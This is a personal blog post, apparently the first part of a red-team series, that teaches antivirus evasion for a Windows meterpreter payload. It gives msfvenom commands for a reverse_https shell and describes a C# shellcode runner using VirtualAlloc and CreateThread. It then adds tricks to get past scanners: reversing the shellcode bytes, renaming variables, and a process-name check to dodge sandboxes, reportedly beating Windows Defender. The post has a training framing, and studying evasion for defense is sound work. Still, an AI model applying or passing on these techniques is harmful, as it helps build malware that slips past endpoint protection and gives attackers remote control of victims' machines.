AV Evasion Part 1
19 Apr 2021After passing the Offensive Security Certified Professional I felt on top of the world.
But soon reality crept in and I realized that Windows Defender flagged the majority of what I was taught. This gave me a false sense of security from a blue team standpoint in thinking that “Modern Anti-Virus companies are pretty good. There is no way an attacker is sneaking past my EDR.
I was wrong.
It turns out that just playing with the payload a little bit completely negates detection and let’s the red team run free. I want to demonstrate in this post some fundamentals of Anti-Virus evasion.
We will start and see what a vanilla meterpreter payload gets us. The following command will generate a meterpreter .exe file in Kali Linux.
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=eth0 LPORT=443 -f exe -o blog1.exe
Now let’s upload this to antiscan.me and see how it gets detected. AntiScan.me is used since it doens’t distribute binaries to the AV venders which makes it more stealthy.
18/26 is a fair bit of detection. (It’s 2021, how do you not detect a vanilla meterpreter payload. Come on vendors).
This would have been the end of me in my original PwK days. Thanks to some basic OSEP training, we have a good base to work with.
Modern day malware heavily utilizes the Win32 API that is built into Windows for several reasons.
- it is built into Windows so functionality doesn't have to be re-written
- It doesn't get flagged by AV
- it is fast and usually well documented.
We choose c# in this demonstration as it is easy to work in and well documented. languages such as Boo and Nim work just as well. This is a standard Win32 API shellcode runner in c# written in Visual Studio. It uses the following function prototypes that were pulled from P/Invoke.
- VirtualAlloc - Create an executable piece of memory.
- CreateThread - To start execution of the shellcode in memory.
- WaitForSingleObject - To not crash upon receiving a command.
We will generate some meterpreter c# shellcode and paste where the comment says to.
msfvenom -p windows/x64/meterpreter/reverse_https lhost=eth0 lport=443 -f csharp
Lets compile our shellcode runner and scan again.
15 out of 26 still isn’t great. Let’s play with our code and see if we can’t get it down even farther.
Since we know our Win32 APIs aren’t getting flagged by signature checks. Let’s mess with our shellcode.
Our shellcode get’s stored as an Array in c#. We can store our shellcode backwards and utilize the Array.Reverse() method to restore our shellcode at runtime to evade detection.
We will use this site to reverse our byte array.
We will take the output from the website and put it over our existing shellcode.
Finally, we will implement our Array.Reverse method. I went ahead and changed the buf variable name in case it would be associated with the signature.
Let’s reupload and see how we did.
Our bypass was very sucessful! Only 6 AVs are catching our payload. Unfortunately, Windows Defender is one of them which is enabled on most devices by default
Let’s see if we can’t squeeze past it.
We know our signature detection is pretty good, but what about heuristics?
Unknown applications get executed in a sandbox before being allowed to execute natively. If our payload can detect if we are in a sandbox, we can evade being flagged as malicious and execute.
Most sandboxes will dynamically rename the payload. We will implement a simple process name check in our code and exit gracefully if the .exe is not named “hop.exe”
C# allows us to do this natively with the Diagnostics library using System.Diagnostics.Process.GetCurrentProcess();
Our code now checks to see if our process is named “hop.exe”. Let’s upload one more time to see if we are sucessful.
Excellent, our payload now evades Windows Defender and is only caught by 5 obscure AVs. Even better, the naming convention tells us we are suspect of a known malware variant or heuristics.
A follow up challenge for the reader is to research HEUR/AGEN.1131009 to see what the heuristic behavior our payload is performing and to research the Rozena malware for similarities to our payloads.
This concluses part one of my AV Evasion writeup and my first post.
“Hop” to see everyone next time.